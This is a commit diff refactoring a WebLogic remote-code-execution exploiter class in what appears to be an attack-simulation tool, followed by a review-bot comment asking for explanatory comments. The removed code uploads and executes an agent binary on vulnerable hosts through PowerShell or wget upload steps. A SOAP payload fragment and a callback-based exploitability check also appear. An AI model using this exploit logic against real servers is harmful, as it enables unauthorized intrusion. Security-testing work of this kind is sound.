Refactored according to final web_rce framework changes
parent
10528c313d
commit
8fd42abd5d
|
@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
|
||||||
'win32': 'monkey-32.exe',
|
'win32': 'monkey-32.exe',
|
||||||
'win64': 'monkey-64.exe'})
|
'win64': 'monkey-64.exe'})
|
||||||
|
|
||||||
def exploit_host(self):
|
def get_exploit_config(self):
|
||||||
# Get open ports
|
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
exploit_config['blind_exploit'] = True
|
||||||
if not ports:
|
exploit_config['stop_checking_urls'] = True
|
||||||
return False
|
exploit_config['url_extensions'] = URLS
|
||||||
# Get urls to try to exploit
|
return exploit_config
|
||||||
urls = self.build_potential_urls(ports, URLS)
|
|
||||||
|
|
||||||
# Checking takes a lot of time, so we check until we get exploitable url and stop
|
|
||||||
vulnerable_urls = []
|
|
||||||
for url in urls:
|
|
||||||
# Get full URL
|
|
||||||
if self.test_exploit(url):
|
|
||||||
vulnerable_urls.append(url)
|
|
||||||
break
|
|
||||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
|
||||||
if not vulnerable_urls:
|
|
||||||
return False
|
|
||||||
|
|
||||||
data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
|
||||||
if not data or data['response'] is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
|
@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
self._stopped = True
|
self._stopped = True
|
||||||
return
|
return
|
||||||
|
|
||||||
def test_exploit(self, url):
|
def check_if_exploitable(self, url):
|
||||||
local_port = get_free_tcp_port()
|
local_port = get_free_tcp_port()
|
||||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
||||||
|
|
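Review bot: The new `get_exploit_config` override in the first hunk sets three keys with no docstring or comment. The rationale that the removed `exploit_host` carried ("Checking takes a lot of time, so we check until we get exploitable url and stop") is dropped along with it. I would keep that reasoning next to the flag, e.g. `# URL checks are slow: stop at the first exploitable URL` above `exploit_config['stop_checking_urls'] = True`. A one-line docstring such as `"""Extend the base WebRCE config for the blind WebLogic exploit."""` would also help. It would be worth a short comment on why `blind_exploit` is set; judging by the local HTTP server started in `check_if_exploitable` (second hunk, body continues outside the hunk), success seems to be confirmed by a callback rather than by the response body, but confirm that against the framework. The override also mutates the dict returned by `super()`, so if the base class hands back a shared object rather than a fresh dict these keys would leak into other exploiters; that is not visible from here and should be checked.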